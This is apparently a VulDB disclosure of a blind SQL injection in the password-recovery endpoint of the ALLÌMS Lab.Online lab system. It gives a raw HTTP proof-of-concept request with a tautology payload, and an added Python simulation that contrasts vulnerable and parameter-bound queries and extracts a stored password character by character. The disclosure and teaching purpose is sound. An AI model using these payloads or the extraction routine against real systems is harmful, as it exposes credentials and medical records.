Submit #493492: Allims Lab.Online Latest SQL Injection With High Privileges

Title: Allims Lab.Online Latest SQL Injection With High Privileges
Description:
Product: Lab.Online
Vendor: ALLÌMS (https://www.allims.com.br/allims-lab-online/)
Vulnerability Type: SQL Injection (Boolean-Based Blind)
Affected Endpoint: /model/model_recuperar_senha.php (POST request)
Vulnerable Parameter: recuperacao
Severity: Critical

A critical SQL injection vulnerability (with high privileges) was identified in Lab.Online, a widely used laboratory management system developed by ALLÌMS. The vulnerability resides in the password recovery function, where the recuperacao parameter is placed into the SQL query without sanitization or parameter binding, so an attacker who controls it can change the structure of the query. This flaw can be exploited to extract sensitive data, bypass authentication, or achieve full database compromise.

Proof of Concept (PoC):
Target: http://x.x.x.x/

POST /model/model_recuperar_senha.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
X-Requested-With: XMLHttpRequest
Referer: http://x.x.x.x/
Cookie: PHPSESSID=eq502tqahlboq5g517deke9e77
Content-Length: 59
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Host: x.x.x.x
Connection: Keep-alive

&recuperacao=-1'%20OR%203*2*1=6%20AND%2000018=00018%20--%20

URL-decoded, the injected value is: -1' OR 3*2*1=6 AND 00018=00018 -- (with a trailing space after the comment marker, which MySQL requires for a "--" comment).

Exploitation Details:
- The injection is boolean-based blind: the payload does not return query results directly; it changes the truth value of the query's WHERE condition, and the attacker infers information from the difference in the application's response.
- The payload -1' OR 3*2*1=6 AND 00018=00018 -- closes the string literal around the parameter, appends a condition that always evaluates to true, and comments out the remainder of the original query.
- Changing 3*2*1=6 to a false comparison (e.g., 3*2*1=7) and comparing the two responses confirms the injection: the responses differ only if the parameter is being interpreted as SQL rather than as a plain string.

Impact:
An attacker can exploit this vulnerability to:
- Bypass authentication, gaining unauthorized access to sensitive data.
- Extract database information, including user credentials, medical records, and administrative data.
- Alter database contents, leading to data manipulation or deletion.
- Compromise the entire system, potentially using the vulnerability for further privilege escalation.
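The following is an added example, not code from the submission or from Lab.Online, that reproduces the boolean-based blind pattern described above against an in-memory SQLite database. It shows the true/false payload pair from the PoC producing different results when the parameter is concatenated into the query, the same pair producing no difference once the value is bound as a parameter, and, going one step beyond the advisory, how the yes/no oracle is turned into character-by-character extraction. The table name (usuarios), column names (email, senha), the shape of the lookup query and the sample rows are all assumptions made for this example; the real Lab.Online query is not known from the page.

```python
"""Simulation of the boolean-based blind SQL injection pattern from the advisory.

Everything about the schema and the query shape is an assumption for this
example; it is not derived from Lab.Online's source code.
"""
import sqlite3

# Constructed sample data (assumption: a users table keyed by e-mail, which
# is what a password-recovery lookup typically searches on).
SAMPLE_ROWS = [
    (1, "admin@example.test", "s3cr3t"),
    (2, "user@example.test", "hunter2"),
]

# The two payloads from the PoC, URL-decoded. They differ only in 6 vs 7.
TRUE_PAYLOAD = "-1' OR 3*2*1=6 AND 00018=00018 -- "
FALSE_PAYLOAD = "-1' OR 3*2*1=7 AND 00018=00018 -- "


def make_db() -> sqlite3.Connection:
    """Build the assumed table and load the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE usuarios (id INTEGER, email TEXT, senha TEXT)")
    conn.executemany("INSERT INTO usuarios VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def recover_vulnerable(conn: sqlite3.Connection, recuperacao: str) -> list:
    """Assumed vulnerable shape: the parameter is spliced into the SQL text,
    so a single quote in it ends the literal and the rest becomes SQL."""
    sql = "SELECT id, email FROM usuarios WHERE email = '" + recuperacao + "'"
    return conn.execute(sql).fetchall()


def recover_hardened(conn: sqlite3.Connection, recuperacao: str) -> list:
    """Hardened form: the value is bound as a parameter and can never become
    part of the SQL grammar, whatever characters it contains."""
    sql = "SELECT id, email FROM usuarios WHERE email = ?"
    return conn.execute(sql, (recuperacao,)).fetchall()


def is_injectable(lookup, conn: sqlite3.Connection) -> bool:
    """The confirmation step from the advisory: the endpoint is injectable
    when the always-true and always-false payloads yield different results."""
    return lookup(conn, TRUE_PAYLOAD) != lookup(conn, FALSE_PAYLOAD)


def extract_blind(lookup, conn: sqlite3.Connection, subquery: str,
                  alphabet: str, max_len: int = 32) -> str:
    """Generic boolean-blind extraction: ask the oracle one character at a
    time whether SUBSTR(<subquery>, pos, 1) equals each candidate character.
    The advisory states extraction is possible but shows no such payload,
    so this part illustrates the technique rather than the PoC itself."""
    result = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            probe = f"-1' OR SUBSTR(({subquery}),{pos},1)='{ch}' -- "
            if lookup(conn, probe):          # non-empty result == "true"
                result += ch
                break
        else:
            break  # no candidate matched: end of the value (or not injectable)
    return result


if __name__ == "__main__":
    db = make_db()
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
    print("vulnerable injectable:", is_injectable(recover_vulnerable, db))
    print("hardened injectable:  ", is_injectable(recover_hardened, db))
    print("extracted via oracle: ",
          extract_blind(recover_vulnerable, db,
                        "SELECT senha FROM usuarios WHERE id=1", alphabet))
```

The vulnerable lookup returns every row for the true payload (the OR branch is true for all of them) and nothing for the false payload, which is exactly the observable difference the advisory uses as its confirmation check; the hardened lookup returns nothing in both cases because the payload is only ever compared as a string.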
Source: https://www.allims.com.br/allims-lab-online/
User: Stux (UID 40142)
Submission: 02/01/2025 16:46 (1 Year ago)
Moderation: 02/10/2025 08:53 (9 days later)
Status: Accepted
VulDB entry: 295061 [Allims lab.online up to 20250201 model_recuperar_senha.php recuperacao sql injection]
Points: 20
